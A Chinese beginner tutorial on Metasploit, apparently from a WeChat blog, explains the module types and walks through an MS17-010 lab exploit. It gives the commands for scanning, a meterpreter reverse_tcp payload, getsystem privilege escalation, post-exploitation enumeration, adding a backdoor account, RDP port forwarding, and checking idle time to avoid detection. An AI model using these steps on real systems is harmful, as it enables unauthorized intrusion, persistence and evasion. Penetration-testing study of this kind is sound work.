Msf模块总体介绍
辅助模块(Aux):扫描、发掘漏洞、探测信息等工作
渗透攻击模块(exploits):利用已发现的漏洞对远程目标系统进行攻击,植入并运行攻击载荷,从而控制目标系统
后渗透攻击模块(post):先拿下一个无关紧要的目标(A)来攻击真正的目标(B),A中来执行真正的渗透攻击攻击载荷模块(payloads):大佬说的没看懂:在渗透攻击触发漏洞后劫持程序执行流程并跳入的这段代码空指令模块(nops)
编码器模块(encoders)
模块之间的使用大概如下:
1、发现一个目标
2、用辅助模块对目标进行扫描,发现漏洞
3、使用对应的渗透攻击模块,然后选择对应的攻击载荷模块,攻击执行成功后会使用到这个,然后得到一个会话
4、会话是目标机器返回的,因此可以在会话里面使用后渗透攻击模块,通过目标机器去攻击另外一台机器
空指令模块,没有使用过,暂时不清楚,编码器模块,也许我使用过,在生成msf shell的时候,有编码功能
目标:做一个实验,在流程上面使用一遍这些模块
通过ms17-010进行实验,扫描漏洞-攻击-攻击采用的方式-攻击成功后可以使用的命令
1、看一下相关漏洞的模块
发现有两个模块。一个是探测漏洞,一个攻击漏洞
search ms17_010
2、先探测一波漏洞是否存在
Use 1
set rhosts 192.168.100.0/24
Show options看看
Exploit执行
发现漏洞主机
3、选择攻击模块
IP变了是因为我中间停了一下
选择了payload:set payload windows/x64/meterpreter/reverse_tcp
然后设置目标机器,监听机器、监听端口
Run
攻击成功,获得了一个metpreter会话
这里通过ms17-010获得了一台windows的shell,接着通过这个shell进行msf的学习。同理我们可以通过webshell上传msf shell上去执行,然后在监听。
merpreter有以下几种命令:
基本命令、文件系统命令、网络命令、系统命令、用户接口命令
1、基本命令
Background命令:退出当前会话,返回msf,会话隐藏在后台
Session命令:查找拥有的session,比如我们上面执行background后隐藏的会话
Quit命令:关闭当前会话
Shell命令:获取目标系统的控制台shell,exit退出
2、文件系统命令
Cat命令:查看文件内容
Getxx:获取一些信息命令
Upload:上传命令
Download:下载命令,将上面的命令的参数转换位置即可
Edit:编辑命令,可以看到这个bbb.txt的文件被我们修改了
Search:命令,查找相关文件
3、网络命令
Ipconfig
route查看本机路由
4、系统命令
Ps:获取系统进程信息
Migration:将merpreter会话转移到另外一个进程的内存空间
Execute:在目标主机上面执行文件
Getuid:获取当前用户信息
Getsystem:meterpreter内置的提权命令
Msf提供了一些可以直接在merpreter中可以直接使用的模块
Post模块也就是后渗透模块
可以直接查看有哪些,然后按需使用
1、查看目标主机安装了哪些应用
Run post/windows/gather/enum_applications
2、查看目标主机存在的用户
Run post/windows/gather/enum_logged_on_users
3、添加用户(会添加到管理员权限失败)
Run getgui -u hacklww -p qwe123!@#
运行shell命令进行修改
4、使用我们添加的新用户或者获得的用户账号密码进行远程登录
所以登录之前要先使用idletime命令查看空闲时长,避免让对方察觉。
5、portfwd:端口转发
将目标的3389端口转发我们主机的7777端口,访问我们本地的7777即为目标3389
暂时到这,下一篇内网学习-信息收集见
本文始发于微信公众号(NOVASEC):MSF入门-各模块之间的简单配合
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论